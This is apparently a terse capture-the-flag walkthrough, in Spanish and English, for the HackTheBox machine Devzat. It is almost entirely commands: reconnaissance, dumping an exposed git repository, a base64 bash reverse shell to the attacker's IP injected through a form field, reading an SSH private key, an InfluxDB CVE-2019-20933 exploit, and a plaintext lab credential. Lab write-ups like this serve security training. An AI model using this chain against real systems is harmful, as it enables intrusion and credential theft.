nmap -A -p- -oA devzat 10.129.246.25 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA devzat 10.129.246.25

nmap -sU -O -p- -oA devzat-udp 10.129.246.25

nikto -h 10.129.246.25:80

Pasted image 20211031163927.png

Pasted image 20211031164021.png

echo "10.129.246.25 devzat.htb pets.devzat.htb" | sudo tee -a /etc/hosts

whatweb http://10.129.246.25

Pasted image 20211031164243.png

Nos vamos a http://devzat.htb

Pasted image 20211031164422.png

ffuf -c -u http://devzat.htb -H "Host:FUZZ.devzat.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc 200

Pasted image 20211031165415.png

Pasted image 20211031171603.png

bash gitdumper.sh http://pets.devzat.htb/.git/ ~/Desktop/boxes/devzat/content/

Pasted image 20211031172421.png

bash /home/cu3rv0x/Desktop/boxes/devzat/GitTools/Extractor/extractor.sh . ~/Desktop/boxes/devzat/content/.git

Pasted image 20211031173610.png

cat main.go

Pasted image 20211031174029.png

echo -n 'bash -i >& /dev/tcp/10.10.14.77/443 0>&1' |base64

Pasted image 20211031180520.png

Abrimos burpsuite y interceptamos http://pets.devzat.htb

Ponemos el nombre y la categoria de mascota

Pasted image 20211031180838.png

para el valor de species ponemos lo que habiamos adquirido cuando cambiamos el reverse shell a base64

Pasted image 20211031181012.png

nc -lvnp 443

cd .ssh

cat id_rsa

Pasted image 20211031181825.png

netstat -ant

chmod 600 id_rsa

Pasted image 20211031182526.png

ssh -l patrick localhost -p 8443

Pasted image 20211031182807.png

git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933.git

cd InfluxDB-Exploit-CVE-2019-20933

Pasted image 20211031183050.png

credenciales catherine:woBeeYareedahc7Oogeephies7Aiseci

su catherine

cd /var/backups

cp devzat* /tmp

Unzip both files and you get a dev folder

Pasted image 20211031190309.png

cat commands.go

Pasted image 20211031190725.png

ssh -l test localhost -p 8443

file ../root.txt CeilingCatStillAThingIn2021?

Pasted image 20211031191123.png

boxes

copyright©2022 Cu3rv0x all rights reserved